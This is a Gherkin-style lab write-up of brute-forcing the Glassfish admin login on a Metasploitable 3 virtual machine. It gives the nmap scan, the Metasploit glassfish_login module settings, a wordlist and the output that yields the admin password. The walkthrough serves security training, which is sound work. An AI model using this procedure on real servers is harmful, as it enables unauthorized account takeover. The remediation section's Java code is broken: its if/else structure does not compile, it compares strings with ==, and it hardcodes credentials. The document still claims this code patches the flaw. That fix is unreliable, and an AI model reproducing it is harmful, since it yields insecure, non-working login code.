## Version 1.4.1
## language: en

Feature:
  TOE:
    Metasploitable 3
  Location: Location of the page/endpoint/server/file with the vulnerability
    10.0.0.235:4848 TCP
  CWE:
    CWE-307: Improper Restriction of Excessive Authentication Attempts:
      https://cwe.mitre.org/data/definitions/307.html
  Rule:
    REQ.237: https://fluidattacks.com/web/rules/237/
  Goal:
    Get Access to the Glassfish Server
  Recommendation:
    Enforce delays and account lockouts after a number failed login attempts

  Background:
  Hacker's software:
    | <Software name>        | <Version>   |
    | Kali GNU/Linux Rolling | 2020.2a     |
    | Nmap                   | 7.80        |
    | Metasploit             | 5.0.87-dev  |
    | Firefox                | 68.7.0esr   |

  TOE information:
    Given I am running a Metasploitable3 windows VM at
    """
    10.0.0.235
    """

  Scenario: Normal use case
    Given I have the appropiate credentials
    When I enter them in the Glassfish login
    Then Then I have access to the administrative dashboard

  Scenario: Dynamic detection
    Given I scan the target machine
    When I scan open ports with
    """
    $ nmap -p0- 10.0.0.235
    """
    Then I get the following output
    """
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-22 14:44 EDT
    Nmap scan report for 10.0.0.235
    Host is up (0.00064s latency).
    Not shown: 65517 filtered ports
    PORT      STATE SERVICE
    21/tcp    open  ftp
    22/tcp    open  ssh
    80/tcp    open  http
    1617/tcp  open  nimrod-agent
    4848/tcp  open  appserv-http
    5985/tcp  open  wsman
    8020/tcp  open  intu-ec-svcdisc
    8022/tcp  open  oa-system
    8027/tcp  open  unknown
    8080/tcp  open  http-proxy
    8282/tcp  open  libelle
    8383/tcp  open  m2mservices
    8484/tcp  open  unknown
    8585/tcp  open  unknown
    9200/tcp  open  wap-wsp
    49153/tcp open  unknown
    49154/tcp open  unknown
    49203/tcp open  unknown
    49204/tcp open  unknown

    Nmap done: 1 IP address (1 host up) scanned in 108.55 seconds
    """
    And I notice that the default port for Glassfish is open
    """
    4848/tcp  open  appserv-http
    """
    Given That the default port for Glassfish is open
    Then I conclude that Glassfish config is probably the default one

  Scenario: Exploitation
    Given There is a possibility of Glassfish having default configuration
    When I enter in
    """
    https://10.0.0.235:4848/
    """
    Then I introduce the default credentials
    """
    username: admin , password: <empty>
    """
    And I get
    """
    Error Authentication Failed
    Re-enter your username and password
    """
    When I search for Metasploit modules for Glassfish
    Then I found the following
    """
    exploit/multi/http/glassfish_deployer
    auxiliary/scanner/http/glassfish_traversal
    auxiliary/scanner/http/glassfish_login
    """
    And I decide to use the last one
    Given The exploit I selected
    When I select it in Metasploit and show what parameter it needs, I get
    """
    msf5 auxiliary(scanner/http/glassfish_login) > show options
    Module options (auxiliary/scanner/http/glassfish_login):
    Name              Current Setting  Required  Description
    ----              ---------------  --------  -----------
    BLANK_PASSWORDS   false            no        Try blank passwords for...
    BRUTEFORCE_SPEED  5                yes       How fast to bruteforce....
    DB_ALL_CREDS      false            no        Try each user/password c...
    DB_ALL_PASS       false            no        Add all passwords in the...
    DB_ALL_USERS      false            no        Add all users in the cur...
    PASSWORD                           no        A specific password to a...
    PASS_FILE                          no        File containing password...
    Proxies                            no        A proxy chain of format...
    RHOSTS                             yes       The target host(s), range...
    RPORT             4848             yes       The target port (TCP)
    SSL               false            no        Negotiate SSL/TLS for outgo...
    STOP_ON_SUCCESS   false            yes       Stop guessing when a creden...
    THREADS           1                yes       The number of concurrent th...
    USERNAME          admin            yes       A specific username to auth...
    USERPASS_FILE                      no        File containing users and p...
    USER_AS_PASS      false            no        Try the username as the pas...
    USER_FILE                          no        File containing usernames...
    VERBOSE           true             yes       Whether to print output for...
    VHOST                              no        HTTP server virtual host
    """
    Then I notice, that a wordlist is probably needed
    And I search for a good one and found
    """
    https://wiki.skullsecurity.org/Passwords
    """
    Then I follow the links to download one of the wordlists and get to
    """
    https://download.openwall.net/pub/wordlists/passwords/
    """
    And download the file, and extract to get
    """
    password.txt
    """
    Given That file
    When I add some common passwords for the VM to the file
    """
    metasploitable3 metasploitable metasploit exploit sploit metaspl01t
    """
    Then I change the name of the file to
    """
    wordlist.txt
    """
    And I procede to introduce the information need for the exploit
    """
    msf5 auxiliary(scanner/http/glassfish_login) > set RHOSTS 10.0.0.235
    RHOSTS => 10.0.0.235
    msf5 auxiliary(scanner/http/glassfish_login) > set pass_file
    /.../wordlist.txt
    pass_file => /.../wordlist.txt
    msf5 auxiliary(scanner/http/glassfish_login) > set STOP_ON_SUCCESS true
    STOP_ON_SUCCESS => true
    msf5 auxiliary(scanner/http/glassfish_login) > set SSL true
    SSL => true
    """
    When I run the exploit, I get the following output
    """
    msf5 auxiliary(scanner/http/glassfish_login) > exploit

    [*] 10.0.0.235:4848 - Checking if Glassfish requires a password...
    [*] 10.0.0.235:4848 - Glassfish is protected with a password
    [-] 10.0.0.235:4848 - Failed: 'admin:12345'
    [-] 10.0.0.235:4848 - Failed: 'admin:abc123'
    [-] 10.0.0.235:4848 - Failed: 'admin:password'
    [-] 10.0.0.235:4848 - Failed: 'admin:computer'
    [-] 10.0.0.235:4848 - Failed: 'admin:123456'
    ...
    [-] 10.0.0.235:4848 - Failed: 'admin:shadow'
    [-] 10.0.0.235:4848 - Failed: 'admin:baseball'
    [-] 10.0.0.235:4848 - Failed: 'admin:donald'
    [-] 10.0.0.235:4848 - Failed: 'admin:harley'
    [-] 10.0.0.235:4848 - Failed: 'admin:admin'
    [-] 10.0.0.235:4848 - Failed: 'admin:metasploitable'
    [-] 10.0.0.235:4848 - Failed: 'admin:metasploit'
    [-] 10.0.0.235:4848 - Failed: 'admin:metasploitable3'
    [-] 10.0.0.235:4848 - Failed: 'admin:exploit'
    [+] 10.0.0.235:4848 - Success: 'admin:sploit'
    [*] Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed
    """
    Then I have found the password for the admin user in Glassfish
    Given The password and default username
    When I enter both in
    """
    https://10.0.0.235:4848/
    """
    Then I have access to the Glassfish dashboard

  Scenario: Remediation
    Given The Glassfish server
    When I look for an option to limit user login failed attempts
    Then I found no such functionality
    And Discover that if it is needed, should be done in custom code
    When I consider that information
    Then I first decide to change the user password to something stronger
    And I go to
    """
    configurations->server-config->security
    """
    And I change the password in
    """
    Default Principal Password
    """
    Given The user now has a strong password
    When I create a method to change login attempts
    Then I write something like the following
    """
    int totalAttempts= 3;
    private void checkLogin() {
        String username = userNameTF.getText();
        String password = passWordTF.getText();
        //Considering temp and pass, username and passwords are obtained from
        //the database
        if (totalAttempts != 0) {
          if (username == "temp" && password == "pass") {
            login(username,password);
          } else {
            System.out.println("Incorrect username or password");
            totalAttempts--;
          } else {
            System.out.println("Maximum number of attempts exceeded");
        }
    }
    """
    And This way, considering the login method from Glassfish
    Then Login attempts would be reduced to 3
    And The vulnerability would be successfully patched

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    8.6/10 (High) - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
  Temporal: Attributes that measure the exploit's popularity and fixability
    8.4/10 (High) - E:H/RL:W/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    7.9/10 (High) - CR:M/IR:L/AR:L

  Scenario: Correlations
    No correlations have been found to this date 2020-07-22
